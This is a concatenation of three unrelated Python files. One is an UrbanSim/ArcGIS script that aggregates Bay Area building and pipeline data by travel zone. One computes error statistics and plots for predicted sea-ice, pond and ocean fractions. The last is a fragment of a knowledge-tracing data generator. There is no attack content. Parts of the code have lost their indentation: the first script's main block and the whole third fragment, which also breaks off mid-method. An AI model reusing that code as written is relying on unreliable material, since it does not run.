    ARCGIS_PROJECT = "C:\\Users\\lzorn\\Documents\\UrbanSim_InputMapping\\UrbanSim_InputMapping.aprx"

# year built categories we care about, as (name, min, max) inclusive bins
YEAR_BUILT_CATEGORIES = [
    ("0000-2000",    0, 2000),
    ("2001-2010", 2001, 2010),
    ("2011-2015", 2011, 2015),
    ("2016-2020", 2016, 2020),
    ("2021-2030", 2021, 2030),
    ("2031-2050", 2031, 2050),
]
# aggregate (coarser) year built bins
YEAR_BUILT_CATEGORIES_AGG = [
    ("0000-2015",    0, 2015),
    ("2016-2050", 2016, 2050),
]
# Bay Area counties with their FIPS-style county ids.
COUNTY_ID_NAME = [
    ("Alameda"      ,  1),
    ("Contra Costa" , 13),
    ("Marin"        , 41),
    ("Napa"         , 55),
    ("San Francisco", 75),
    ("San Mateo"    , 81),
    ("Santa Clara"  , 85),
    ("Solano"       , 95),
    ("Sonoma"       , 97),
]
COUNTY_ID_NAME_DF = pandas.DataFrame(COUNTY_ID_NAME, columns=["county","county_id"])
def set_year_built_category(df):
    """Label each row of `df` with year-built bins.

    Adds a `year_built_category` (fine bins) and a
    `year_built_category_agg` (coarse bins) column derived from the
    `year_built` column, using the module-level YEAR_BUILT_CATEGORIES /
    YEAR_BUILT_CATEGORIES_AGG (name, min_year, max_year) tuples. Rows
    falling outside every bin keep the sentinel "????-????".
    """
    bin_specs = [
        ("year_built_category", YEAR_BUILT_CATEGORIES),
        ("year_built_category_agg", YEAR_BUILT_CATEGORIES_AGG),
    ]
    for column, categories in bin_specs:
        df[column] = "????-????"
        for name, min_year, max_year in categories:
            in_bin = (df.year_built >= min_year) & (df.year_built <= max_year)
            df.loc[in_bin, column] = name
    return df
def warn_zone_county_disagreement(df):
    """Stub: log TAZ rows whose county disagrees with the travel-model
    TAZ/county correspondence (see TAZ_COUNTY_FILE).

    Not implemented yet; see the module header note about zone_id /
    county inconsistencies in the UrbanSim basemap.
    """
    # check if zone/county mapping disagree with the TM mapping and log issues
    # TODO
    pass
if __name__ == '__main__':
# pandas options
pandas.options.display.max_rows = 999
if not os.path.exists(OUTPUT_DIR): os.mkdir(OUTPUT_DIR)
# create logger
logger = logging.getLogger(__name__)
logger.setLevel('DEBUG')
# console handler
ch = logging.StreamHandler()
ch.setLevel('INFO')
ch.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))
logger.addHandler(ch)
# file handler
fh = logging.FileHandler(LOG_FILE, mode='w')
fh.setLevel('DEBUG')
fh.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p'))
logger.addHandler(fh)
logger.info("Output dir: {}".format(OUTPUT_DIR))
####################################
taz_sd_county_df = pandas.read_csv(TAZ_COUNTY_FILE)
logger.info("Read {}; head:\n{}".format(TAZ_COUNTY_FILE, taz_sd_county_df.head()))
# let's just keep taz/county
taz_sd_county_df = taz_sd_county_df[["ZONE","COUNTY_NAME", "SD_NAME", "SD_NUM_NAME"]]
taz_sd_county_df.rename(columns={"ZONE":"zone_id", "COUNTY_NAME":"county"},inplace=True)
# and county_id
taz_sd_county_df = pandas.merge(left=taz_sd_county_df, right=COUNTY_ID_NAME_DF)
logger.debug("taz_sd_county_df head:\n{}".format(taz_sd_county_df.head()))
####################################
building_types_df = pandas.read_csv(BUILDING_TYPE_FILE, skipinitialspace=True)
building_types_df.set_index("building_type_det", inplace=True)
logger.info("Read {}:\n{}".format(BUILDING_TYPE_FILE, building_types_df))
BUILDING_TYPE_TO_DESC = building_types_df["detailed description"].to_dict()
BUILDING_TYPE_TO_DESC["all"] = "all"
logger.debug("BUILDING_TYPE_TO_DESC: {}".format(BUILDING_TYPE_TO_DESC))
building_activity_df = pandas.read_excel(BUILDING_TYPE_ACTIVITY_FILE, sheet_name="building_type")
building_types_df = pandas.merge(left=building_types_df, right=building_activity_df,
how="left", left_index=True, right_on="building_type_det")
logger.debug("building_types_df: \n{}".format(building_types_df))
####################################
tm_lu_df = pandas.read_csv(EMPLOYMENT_FILE)
logger.info("Read {}; head:\n{}".format(EMPLOYMENT_FILE, tm_lu_df.head()))
tm_lu_df.rename(columns={"ZONE":"zone_id"}, inplace=True)
# keep only employment, tothh, totpop, hhpop
tm_lu_df = tm_lu_df[["zone_id","TOTHH","TOTPOP","HHPOP","TOTEMP","RETEMPN","FPSEMPN","HEREMPN","AGREMPN","MWTEMPN","OTHEMPN"]]
####################################
# Parcels & buildings from the UrbanSim basemap HDF5.
logger.info("Reading parcels and buildings from {}".format(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE)))
# use this for parcel_id (index), county_id, zone_id, acres
parcels_df = pandas.read_hdf(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE), key='parcels')
parcels_df = parcels_df[["zone_id","acres"]].reset_index().rename(columns={"acres":"parcel_acres"})
logger.info("parcels_df.head():\n{}".format(parcels_df.head()))
# sum parcel acres to zone
parcels_zone_df = parcels_df.groupby(["zone_id"]).agg({"parcel_acres":"sum"}).reset_index()
logger.info("parcels_zone_df:\n{}".format(parcels_zone_df.head()))
buildings_df = pandas.read_hdf(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_BASEMAP_FILE), key='buildings')
logger.info("buildings_df.dtypes:\n{}".format(buildings_df.dtypes))
# segment year built to 0000-2000, 2001-2010, 2011-2015
buildings_df = set_year_built_category(buildings_df)
logger.info("buildings_df by year_built_category:\n{}".format(buildings_df["year_built_category"].value_counts()))
# join buildings to parcel to get the zone
buildings_df = pandas.merge(left=buildings_df, right=parcels_df[["parcel_id","zone_id"]],
                            how="left", left_on=["parcel_id"], right_on=["parcel_id"])
# Sanity checks: rows missing year_built or building_type can't be categorized below.
# Note: Logger.warn() is a deprecated alias -- use warning().
buildings_no_year_built = buildings_df.loc[pandas.isnull(buildings_df.year_built)]
if len(buildings_no_year_built) > 0:
    logger.warning("buildings_df has {} rows with no year_built:\n{}".format(len(buildings_no_year_built), buildings_no_year_built))
else:
    logger.info("buildings_df has 0 rows with no year_built")
buildings_no_building_type = buildings_df.loc[pandas.isnull(buildings_df.building_type)]
if len(buildings_no_building_type) > 0:
    logger.warning("buildings_df has {} rows with no building_type:\n{}".format(len(buildings_no_building_type), buildings_no_building_type))
else:
    logger.info("buildings_df has 0 rows with no building_type")
#### sum to zone by year_built_category and building_type: residential_units, residential_sqft, non_residential_sqft
buildings_zone_btype_df = buildings_df.groupby(["zone_id","year_built_category_agg","year_built_category","building_type"]).agg(
    {"residential_units"  :"sum",
     "building_sqft"      :"sum",
     "residential_sqft"   :"sum",
     "non_residential_sqft":"sum"})
buildings_zone_btype_df.reset_index(inplace=True)
buildings_zone_btype_df["source"] = "buildings"   # distinguishes basemap rows from pipeline rows downstream
# reorder
buildings_zone_btype_df = buildings_zone_btype_df[["zone_id","source",
                                                   "year_built_category_agg","year_built_category","building_type",
                                                   "residential_units","building_sqft","residential_sqft","non_residential_sqft"]]
logger.info("buildings_zone_btype_df.head():\n{}".format(buildings_zone_btype_df.head()))
logger.info("buildings_zone_btype_df.dtypes:\n{}".format(buildings_zone_btype_df.dtypes))
#### sum to zone by year_built_category and NOT building_type: residential_units, residential_sqft, non_residential_sqft
buildings_zone_df = buildings_df.groupby(["zone_id","year_built_category_agg","year_built_category"]).agg(
    {"residential_units"  :"sum",
     "building_sqft"      :"sum",
     "residential_sqft"   :"sum",
     "non_residential_sqft":"sum"})
buildings_zone_df.reset_index(inplace=True)
buildings_zone_df["source"] = "buildings"
buildings_zone_df["building_type"] = "all"   # synthetic category: totals across building types
# reorder to match the by-building-type frame so they can be concatenated later
buildings_zone_df = buildings_zone_df[list(buildings_zone_btype_df.columns.values)]
logger.info("buildings_zone_df.head():\n{}".format(buildings_zone_df.head()))
logger.info("buildings_zone_df.dtypes:\n{}".format(buildings_zone_df.dtypes))
####################################
# read pipeline file (development projects expected from 2016 on)
logger.info("Reading pipeline from {}".format(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_PIPELINE_FILE)))
pipeline_df = pandas.read_csv(os.path.join(URBANSIM_LOCAL_DIR, URBANSIM_PIPELINE_FILE))
logger.info("pipeline_df.head():\n{}".format(pipeline_df.head()))
logger.info("pipeline_df.dtypes:\n{}".format(pipeline_df.dtypes))
# segment year built into categories, same helper as for the basemap buildings
pipeline_df = set_year_built_category(pipeline_df)
logger.info("pipeline_df by year_built_category:\n{}".format(pipeline_df["year_built_category"].value_counts()))
logger.info("pipeline_df by year_built_category_agg:\n{}".format(pipeline_df["year_built_category_agg"].value_counts()))
# Sanity checks mirroring the buildings checks above.
# Note: Logger.warn() is a deprecated alias -- use warning().
pipeline_no_year_built = pipeline_df.loc[pandas.isnull(pipeline_df.year_built)]
if len(pipeline_no_year_built) > 0:
    logger.warning("pipeline_df has {} rows with no year_built:\n{}".format(len(pipeline_no_year_built), pipeline_no_year_built))
else:
    logger.info("pipeline_df has 0 rows with no year_built")
pipeline_no_building_type = pipeline_df.loc[pandas.isnull(pipeline_df.building_type)]
if len(pipeline_no_building_type) > 0:
    logger.warning("pipeline_df has {} rows with no building_type:\n{}".format(len(pipeline_no_building_type), pipeline_no_building_type))
else:
    logger.info("pipeline_df has 0 rows with no building_type")
# sum to zone by year_built_category and building_type
# assume residential_sqft = building_sqft - non_residential_sqft
pipeline_df["residential_sqft"] = pipeline_df["building_sqft"] - pipeline_df["non_residential_sqft"]
#### sum to zone by year_built_category and building_type: residential_units, residential_sqft, non_residential_sqft
pipeline_zone_btype_df = pipeline_df.groupby(["ZONE_ID","year_built_category_agg","year_built_category","building_type"]).agg(
    {"residential_units"  :"sum",
     "building_sqft"      :"sum",
     "residential_sqft"   :"sum",
     "non_residential_sqft":"sum"})
pipeline_zone_btype_df.reset_index(inplace=True)
pipeline_zone_btype_df.rename(columns={"ZONE_ID":"zone_id"}, inplace=True)
pipeline_zone_btype_df.loc[ pandas.isnull(pipeline_zone_btype_df.zone_id), "zone_id"] = 0 # null => 0
pipeline_zone_btype_df.zone_id = pipeline_zone_btype_df.zone_id.astype(int)
pipeline_zone_btype_df["source"] = "pipeline"
# match the buildings frames' column order so the frames concatenate cleanly
pipeline_zone_btype_df = pipeline_zone_btype_df[list(buildings_zone_btype_df.columns)]
logger.info("pipeline_zone_btype_df.head():\n{}".format(pipeline_zone_btype_df.head()))
logger.info("pipeline_zone_btype_df.dtypes:\n{}".format(pipeline_zone_btype_df.dtypes))
#### sum to zone by year_built_category and NOT building_type: residential_units, residential_sqft, non_residential_sqft
pipeline_zone_df = pipeline_df.groupby(["ZONE_ID","year_built_category_agg","year_built_category"]).agg(
    {"residential_units"  :"sum",
     "building_sqft"      :"sum",
     "residential_sqft"   :"sum",
     "non_residential_sqft":"sum"})
pipeline_zone_df.reset_index(inplace=True)
pipeline_zone_df.rename(columns={"ZONE_ID":"zone_id"}, inplace=True)
pipeline_zone_df.loc[ pandas.isnull(pipeline_zone_df.zone_id), "zone_id"] = 0 # null => 0
pipeline_zone_df.zone_id = pipeline_zone_df.zone_id.astype(int)
pipeline_zone_df["source"] = "pipeline"
pipeline_zone_df["building_type"] = "all"   # synthetic category: totals across building types
pipeline_zone_df = pipeline_zone_df[list(buildings_zone_btype_df.columns)]
logger.info("pipeline_zone_df.head():\n{}".format(pipeline_zone_df.head()))
logger.info("pipeline_zone_df.dtypes:\n{}".format(pipeline_zone_df.dtypes))
####################################
# take buildings & pipeline by zone
zone_df = pandas.concat([buildings_zone_btype_df,
                         buildings_zone_df,
                         pipeline_zone_btype_df,
                         pipeline_zone_df], axis="index")
logger.info("zone_df.head():\n{}".format(zone_df.head()))
logger.debug("zone_df for zone_id=1: \n{}".format(zone_df.loc[zone_df.zone_id==1]))

def flatten_pivot_columns(piv_df):
    # Collapse the pivot table's (value, source, year, btype) column tuples in
    # place into flat names "<source> <year> <btype> <value>"; the index column
    # ('zone_id', '', '', '') keeps just its own name.
    new_cols = []
    for col in piv_df.columns.values:
        if col[1] == '':   # ('zone_id', '', '', '')
            new_cols.append(col[0])
        else:              # ('building_sqft', 'buildings', '0000-2000', 'HM')
            new_cols.append(col[1]+" "+col[2]+" "+col[3]+" "+col[0])
    piv_df.columns = new_cols

# pivot on buildings/pipeline including ALL building types
# aggfunc="sum" (string form) -- passing the numpy.sum callable is deprecated in pandas
zone_piv_df = zone_df.pivot_table(index  ="zone_id",
                                  columns=["source","year_built_category","building_type"],
                                  values =["residential_units", "building_sqft", "residential_sqft", "non_residential_sqft"],
                                  aggfunc="sum")
logger.info("zone_piv_df.head():\n{}".format(zone_piv_df.head()))
zone_piv_df.reset_index(inplace=True)
logger.debug("zone_piv_df for zone_id=1: \n{}".format(zone_piv_df.loc[zone_piv_df.zone_id==1].squeeze()))
# convert column names from tuples
flatten_pivot_columns(zone_piv_df)
logger.debug("zone_piv_df.head():\n{}".format(zone_piv_df.head()))
logger.debug("zone_piv_df.dtypes:\n{}".format(zone_piv_df.dtypes))
logger.debug("zone_piv_df.sum():\n{}".format(zone_piv_df.sum()))
# same pivot but using the aggregated year-built categories
zone_piv_agg_df = zone_df.pivot_table(index  ="zone_id",
                                      columns=["source","year_built_category_agg","building_type"],
                                      values =["residential_units", "building_sqft", "residential_sqft", "non_residential_sqft"],
                                      aggfunc="sum")
logger.info("zone_piv_agg_df.head():\n{}".format(zone_piv_agg_df.head()))
zone_piv_agg_df.reset_index(inplace=True)
logger.debug("zone_piv_agg_df for zone_id=1: \n{}".format(zone_piv_agg_df.loc[zone_piv_agg_df.zone_id==1].squeeze()))
# convert column names from tuples
flatten_pivot_columns(zone_piv_agg_df)
logger.debug("zone_piv_agg_df.head():\n{}".format(zone_piv_agg_df.head()))
logger.debug("zone_piv_agg_df.dtypes:\n{}".format(zone_piv_agg_df.dtypes))
logger.debug("zone_piv_agg_df.sum():\n{}".format(zone_piv_agg_df.sum()))
# merge zone_piv_df and zone_piv_agg_df
zone_piv_df = pandas.merge(left=zone_piv_df, right=zone_piv_agg_df, left_on="zone_id", right_on="zone_id", how="outer")
# will create 4 datasets
# The long column lists are generated rather than hand-enumerated: every entry
# is "zone_id"/"source" or "<source> <year range> <building type> <measure>",
# matching the flattened pivot-table column names built above.  Order matters:
# it determines the output CSV column order, so the products below reproduce
# the original hand-written ordering exactly (year outer, building type inner).

# building types carrying residential units in the basemap / pipeline
_BASE_RES_BTYPES = ["DM", "HS", "HT", "HM", "MR", "all"]
_PIPE_RES_BTYPES = ["AL", "DM", "HS", "HT", "HM", "ME", "MR", "all"]
# full detailed building-type list (plus "all") used for non-residential sqft
_NONRES_BTYPES = ["AL", "CM", "DM", "FP", "GV", "HM", "HO", "HP", "HS", "HT",
                  "IH", "IL", "IN", "IW", "LR", "ME", "MH", "MR", "MT", "OF",
                  "OT", "PA", "PG", "RB", "RF", "RS", "SC", "SR", "UN", "VA",
                  "VP", "all"]
# year-built ranges: three disjoint ranges followed by the aggregate range
_BASE_YEARS = ["0000-2000", "2001-2010", "2011-2015", "0000-2015"]
_PIPE_YEARS = ["2016-2020", "2021-2030", "2031-2050", "2016-2050"]

KEEP_COLUMNS_BY_DATASET = {
    # residential units by year built & residential building type; the last
    # entry ("buildings 0000-2015 all residential_units") is the 2015 HU count
    "base_res": ["zone_id", "source"] +
        ["buildings {} {} residential_units".format(year, btype)
         for year in _BASE_YEARS for btype in _BASE_RES_BTYPES],
    # non-res sqft by year built, plus the 2015 total ("0000-2015") broken out
    # by detailed building type; building_sqft totals at the end
    "base_nonres": ["zone_id", "source"] +
        ["buildings {} all non_residential_sqft".format(year) for year in _BASE_YEARS[:3]] +
        ["buildings 0000-2015 {} non_residential_sqft".format(btype) for btype in _NONRES_BTYPES] +
        ["buildings {} all building_sqft".format(year) for year in _BASE_YEARS],
    # residential units built from 2016 on
    "pipe_res": ["zone_id", "source"] +
        ["pipeline {} {} residential_units".format(year, btype)
         for year in _PIPE_YEARS for btype in _PIPE_RES_BTYPES],
    # commercial square feet built from 2016
    "pipe_nonres": ["zone_id", "source"] +
        ["pipeline {} all non_residential_sqft".format(year) for year in _PIPE_YEARS[:3]] +
        ["pipeline 2016-2050 {} non_residential_sqft".format(btype) for btype in _NONRES_BTYPES],
}
# Build the four output datasets: select the relevant pivot columns, attach
# parcel acres, employment (non-res only), derived densities, and geography.
zone_datasets = {}
for dataset in KEEP_COLUMNS_BY_DATASET:
    logger.info("Creating dataset for {}".format(dataset))
    # keep only the configured columns that actually exist in the pivot
    # (a year/btype combination with no rows produces no pivot column)
    keep_columns_present = [col for col in KEEP_COLUMNS_BY_DATASET[dataset]
                            if col in zone_piv_df.columns]
    # .copy() so the fillna below modifies an independent frame rather than a
    # view of zone_piv_df (avoids pandas chained-assignment problems)
    zone_dataset_piv_df = zone_piv_df[keep_columns_present].copy()
    # fill na with zero
    zone_dataset_piv_df.fillna(value=0, inplace=True)
    logger.info("zone_dataset_piv_df.dtypes:\n{}".format(zone_dataset_piv_df.dtypes))
    # add parcel acres
    zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=parcels_zone_df, how="outer")
    # and employment, if relevant
    if dataset == "base_nonres":
        zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=tm_lu_df, how="outer")
        # and 2015 Employee Density (zero where there are no parcel acres)
        zone_dataset_piv_df["Employee Density 2015"] = zone_dataset_piv_df["TOTEMP"]/zone_dataset_piv_df["parcel_acres"]
        zone_dataset_piv_df.loc[ zone_dataset_piv_df["parcel_acres"] == 0, "Employee Density 2015" ] = 0.0
        # 2015 Commercial Square Feet per Employee (zero where there is no employment)
        zone_dataset_piv_df["Commercial Square Feet per Employee 2015"] = \
            zone_dataset_piv_df["buildings 0000-2015 all non_residential_sqft"]/zone_dataset_piv_df["TOTEMP"]
        zone_dataset_piv_df.loc[ zone_dataset_piv_df["TOTEMP"] == 0, "Commercial Square Feet per Employee 2015"] = 0.0
    # and 2015 HU Density, if relevant
    if dataset == "base_res":
        zone_dataset_piv_df["HU Density 2015"] = zone_dataset_piv_df["buildings 0000-2015 all residential_units"]/zone_dataset_piv_df["parcel_acres"]
        zone_dataset_piv_df.loc[ zone_dataset_piv_df["parcel_acres"] == 0, "HU Density 2015" ] = 0.0
    # zone pivot: add county/superdistrict
    zone_dataset_piv_df = pandas.merge(left=zone_dataset_piv_df, right=taz_sd_county_df, how="outer")
    logger.info("zone_dataset_piv_df.head():\n{}".format(zone_dataset_piv_df.head()))
    # write zone_dataset_piv_df
    zone_dataset_piv_file = os.path.join(OUTPUT_DIR, "{}.csv".format(dataset))
    zone_dataset_piv_df.to_csv(zone_dataset_piv_file, index=False)
    logger.info("Wrote {}".format(zone_dataset_piv_file))
    # keep it for arcpy
    zone_datasets[dataset] = zone_dataset_piv_df
# for tableau, let's not pivot, and let's not keep the all btypes
zone_df = pandas.concat([buildings_zone_btype_df, pipeline_zone_btype_df], axis="index")
# zone: add county/superdistrict
zone_df = pandas.merge(left=zone_df, right=taz_sd_county_df, how="outer")
logger.info("zone_df.head():\n{}".format(zone_df.head()))
# write zone_df
zone_file = os.path.join(OUTPUT_DIR, "urbansim_input_zonedata.csv")
zone_df.to_csv(zone_file, index=False)
logger.info("Wrote {}".format(zone_file))
# Export everything to an ArcGIS geodatabase: one table + joined feature class
# per dataset, with readable field aliases and shared metadata.
logger.info("importing arcpy....")
import arcpy
arcpy.env.workspace = WORKSPACE_GDB
# create metadata, attached to each feature class below
new_metadata = arcpy.metadata.Metadata()
new_metadata.title = "UrbanSim input"
new_metadata.summary = "Data derived from UrbanSim Basemap and Development Pipeline for review"
new_metadata.description = \
    "Basemap source: {}\n".format(URBANSIM_BASEMAP_FILE) + \
    "Pipeline source: {}\n".format(URBANSIM_PIPELINE_FILE) + \
    "Employment source: {}\n".format(EMPLOYMENT_FILE)
logger.info("Metadata description: {}".format(new_metadata.description))
new_metadata.credits = "create_tazdata_devpipeline_map.py"
# matches arcpy-mangled field names like "buildings_0000_2000_HM_building_sqft";
# raw string so the \S escapes aren't flagged as invalid escapes by newer Pythons
field_re = re.compile(r"(pipeline|buildings)_(\S\S\S\S_\S\S\S\S)_([a-zA-Z]+)_(\S+)$")
# aliases for travel-model land-use fields (constant, so defined once outside the loop)
# https://github.com/BayAreaMetro/modeling-website/wiki/TazData
ALIASES = {
    "TOTEMP" : "Total employment",
    "RETEMPN": "Retail employment",
    "FPSEMPN": "Financial and prof employment",
    "HEREMPN": "Health edu and rec employment",
    "AGREMPN": "Ag and natural res employment",
    "MWTEMPN": "Manuf wholesale and transp employment",
    "OTHEMPN": "Other employment"
}
for dataset in zone_datasets.keys():
    logger.info("Processing dataset {}".format(dataset))
    # bring in binary of dataset since arcpy mangles csv datatypes
    dataset_table = "{}".format(dataset)
    try: arcpy.Delete_management(dataset_table)
    except Exception: pass   # table may not exist yet
    logger.info("Converting dataset to arcpy table {}".format(dataset_table))
    zone_piv_nparr = numpy.array(numpy.rec.fromrecords(zone_datasets[dataset].values))
    zone_piv_nparr.dtype.names = tuple(zone_datasets[dataset].dtypes.index.tolist())
    arcpy.da.NumPyArrayToTable(zone_piv_nparr, os.path.join(WORKSPACE_GDB, dataset_table))
    # create join layer with tazdata and zone_file
    logger.info("Joining {} with {}".format(TAZ_SHPFILE, dataset_table))
    dataset_joined = arcpy.AddJoin_management(TAZ_SHPFILE, "TAZ1454",
                                              os.path.join(WORKSPACE_GDB, dataset_table), "zone_id")
    # save it as a feature class -- delete one if it already exists first
    dataset_fc = "{}_fc".format(dataset)
    try: arcpy.Delete_management(dataset_fc)
    except Exception: pass
    logger.info("Saving it as {}".format(dataset_fc))
    arcpy.CopyFeatures_management(dataset_joined, dataset_fc)
    # set human-readable aliases on the joined fields
    fieldList = arcpy.ListFields(dataset_fc)
    for field in fieldList:
        logger.debug("field: [{}]".format(field.name))
        if field.name.startswith("{}_".format(dataset_table)):
            # strip the "<table>_" prefix the join added
            postfix = field.name[len(dataset_table)+1:]
            logger.debug("postfix: [{}]".format(postfix))
            if postfix in ALIASES.keys():
                arcpy.AlterField_management(dataset_fc, field.name, new_field_alias=ALIASES[postfix])
            else:
                match = field_re.match(postfix)
                if match:
                    logger.debug("match: {} {} {} {}".format(match.group(1), match.group(2), match.group(3), match.group(4)))
                    new_alias = ""
                    if match.group(4) == "residential_units":
                        new_alias = "HU "
                    elif match.group(4) == "non_residential_sqft":
                        new_alias = "nonres sqft "
                    elif match.group(4) == "building_sqft":
                        new_alias = "bldg sqft "
                    new_alias += match.group(2) + " " # year range
                    new_alias += BUILDING_TYPE_TO_DESC[match.group(3)] # building type
                    arcpy.AlterField_management(dataset_fc, field.name, new_field_alias=new_alias)
    # set metadata
    logger.info("Setting featureclass metadata")
    dataset_fc_metadata = arcpy.metadata.Metadata(dataset_fc)
    logger.debug("feature class metadata isReadOnly? {}".format(dataset_fc_metadata.isReadOnly))
    dataset_fc_metadata.copy(new_metadata)
    dataset_fc_metadata.save()
# copy over pipeline with additional info added from building_types_df
building_types_table = "building_types"
try: arcpy.Delete_management(building_types_table)
except Exception: pass
building_types_arr = numpy.array(numpy.rec.fromrecords(building_types_df.values))
building_types_arr.dtype.names = tuple(building_types_df.dtypes.index.tolist())
arcpy.da.NumPyArrayToTable(building_types_arr, os.path.join(WORKSPACE_GDB, building_types_table))
# create join layer with tazdata and zone_file
logger.info("Joining {} with {}".format(os.path.join(URBANSIM_PIPELINE_GDB, "pipeline"), building_types_table))
dataset_joined = arcpy.AddJoin_management(os.path.join(URBANSIM_PIPELINE_GDB, "pipeline"), "building_type",
                                          os.path.join(WORKSPACE_GDB, building_types_table), "building_type_det")
pipeline_fc = "pipeline"
try: arcpy.Delete_management(pipeline_fc)
except Exception: pass
logger.info("Saving it as {}".format(pipeline_fc))
arcpy.CopyFeatures_management(dataset_joined, pipeline_fc)
logger.info("Complete")
"""
=> Save individual layer as web layer
Go to Service URL (ugly webpage that looks like services3.arcgis.com...)
Click on link View In: ArcGIS.com Map
Add that to the web map and the field aliases will work
Pop-up panel widget for custom web app:
https://community.esri.com/docs/DOC-7355-popup-panel-widget-version-213-102519
Basemap Employment for TAZ {base_nonres_zone_id}
<font size="2">
<table>
<tr><td>Total Employment:</td><td>{base_nonres_TOTEMP}</td></tr>
<tr><td>Retail:</td><td>{base_nonres_RETEMPN}</td></tr>
<tr><td>Financial & prof:</td><td>{base_nonres_FPSEMPN}</td></tr>
<tr><td>Health, educ & rec:</td><td>{base_nonres_HEREMPN}</td></tr>
<tr><td>Ag & natural res.:</td><td>{base_nonres_AGREMPN}</td></tr>
<tr><td>Manuf, wholesale and transp:</td><td>{base_nonres_MWTEMPN}</td></tr>
<tr><td>Other:</td><td>{base_nonres_OTHEMPN}</td></tr><p><span></td></tr>
<tr><td>Parcel acres:</td><td>{base_nonres_parcel_acres}</td></tr>
<tr><td>Employee Density:</td><td>{base_nonres_Employee_Density_2015}</td></tr>
<tr><td>Non-Residential Square Feet:</td><td>{base_nonres_buildings_0000_2015_all_no}</td></tr>
<tr><td>Commercial Square Feet per Employee:</td><td>{base_nonres_Commercial_Square_Feet_per}</td></tr>
</table>
</font>
Charts:
Employment by Industry
Non-Residential Sqft by Year Built
Basemap Housing Units for TAZ {base_res_zone_id}
Charts:
Housing Unit by Building Type
Housing Unit by Year Built
Decode( building_type,
'HS','single family residential'
'HT','townhomes',
'HM','multi family residential',
'MH','mobile home',
'SR','single room occupancy',
'AL','assisted living',
'DM','dorm or shelter',
'CM','condo or apt common area',
'OF','office',
'GV','gov',
'HP','hospital',
'HO','hotel',
'SC','k12 school',
'UN','college or university',
'IL','light industrial',
'FP','food processing and wineries',
'IW','warehouse or logistics',
'IH','heavy industrial',
'RS','retail general',
'RB','retail big box or regional',
'MR','mixed use residential focused',
'MT','mixed use industrial focused',
'ME','mixed use employment focused',
'PA','parking lot',
'PG','parking garage',
'VA','vacant',
'LR','golf course or other low density rec use',
'VP','vacant permanently such as park or transport net',
'OT','other or unknown',
'IN','institutional',
'RF','retail food or drink',
'unknown')
"""
9717467 | import numpy as np
from scipy import stats
import matplotlib
matplotlib.use('tkagg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from scipy.stats import kde
def print_stats(labels_test, labels_predict):
    '''
    Print error statistics comparing predicted vs. true labels.

    Both arguments are (n_samples, 3) arrays whose columns hold the ice,
    pond (melt pond), and ocean (water) fractions respectively.  Prints:
    per-column RMSE and bias, a linear regression (slope/intercept/R) of
    predicted against true values for each column, and the mean per-sample
    prediction sum (should be close to 1 for fractional labels).

    Returns None; all results go to stdout.
    '''
    labels_test = np.asarray(labels_test, dtype=float)
    labels_predict = np.asarray(labels_predict, dtype=float)

    # Vectorized error stats (replaces the original per-sample Python loop;
    # mean of diffs == bias, sqrt of mean squared diffs == RMSE).
    diff = labels_predict - labels_test
    bias_i, bias_pl, bias_w = diff.mean(axis=0)
    rmse_i, rmse_pl, rmse_w = np.sqrt(np.square(diff).mean(axis=0))
    average_sum = labels_predict.sum(axis=1).mean()

    print("RMSE: I: {0:0.3f} | P: {1:0.3f} | W: {2:0.3f}".format(rmse_i, rmse_pl, rmse_w))
    print("Bias: I: {0:0.3f} | P: {1:0.3f} | W: {2:0.3f}".format(bias_i, bias_pl, bias_w))
    ice_stats = stats.linregress(labels_test[:, 0], labels_predict[:, 0])
    print("ice: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(ice_stats[0],
                                                                      ice_stats[1],
                                                                      ice_stats[2]))
    pnd_stats = stats.linregress(labels_test[:, 1], labels_predict[:, 1])
    print("pnd: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(pnd_stats[0],
                                                                      pnd_stats[1],
                                                                      pnd_stats[2]))
    ocn_stats = stats.linregress(labels_test[:, 2], labels_predict[:, 2])
    print("ocn: Slope: {0:0.3f} | Int: {1:0.3f} | R: {2:0.3f}".format(ocn_stats[0],
                                                                      ocn_stats[1],
                                                                      ocn_stats[2]))
    print("Average sum: {}".format(average_sum))
def plot_results(labels_test, labels_predict):
    """Show side-by-side 2D histograms of predicted vs. true class fractions.

    Both arguments are (n_samples, 3) arrays; column i holds the fraction for
    the i-th class (ice, pond, ocean).  Opens an interactive matplotlib window
    (blocks on plt.show()); returns None.
    """
    fig, axs = plt.subplots(ncols=3, sharey=True)
    # One panel per class -- the three panels were identical except for the
    # column index and title, so draw them in a loop.
    for col, (ax, title) in enumerate(zip(axs, ("Ice", "Pond", "Ocean"))):
        ax.hist2d(labels_test[:, col], labels_predict[:, col],
                  bins=90,
                  norm=colors.LogNorm(),   # log color scale: counts span orders of magnitude
                  cmap='PuBu')
        ax.axis([0, 1, 0, 1])              # fractions live in [0, 1]
        ax.set_title(title)
    # label only the center panel, as before
    axs[1].set_xlabel("True")
    fig.tight_layout()
    plt.show()
11319206 | import numpy as np
import pandas as pd
import os, sys
from data.load_data import f
from Representation.dkt import DKT
from Representation.problem2vec import P2V
from Qmatrix.qmatrix import Qmatrix
from AFM.load_data import load_data
from DAFM.load_data import DAFM_data
import pdb
class afm_data_generator():
def __init__(self, args):
self.args = args
self.use_batches = True if self.args.dafm[1] == "Yes" else False
def create_dict(self):
representation_obj = {}
representation_obj['rnn-dense'] = DKT(self.original_data, 'dense','rnn')
representation_obj['rnn-correct'] = DKT(self.original_data, 'correct','rnn')
representation_obj['rnn-incorrect'] = DKT(self.original_data, 'incorrect','rnn')
representation_obj['rnn-correct-incorrect'] = DKT(self.original_data, 'correct-incorrect','rnn')
# representation_obj['lstm-dense'] = DKT(self.original_data, 'dense','lstm')
# representation_obj['lstm-correct'] = DKT(self.original_data, 'correct','lstm')
# representation_obj['lstm-incorrect'] = DKT(self.original_data, 'incorrect','lstm')
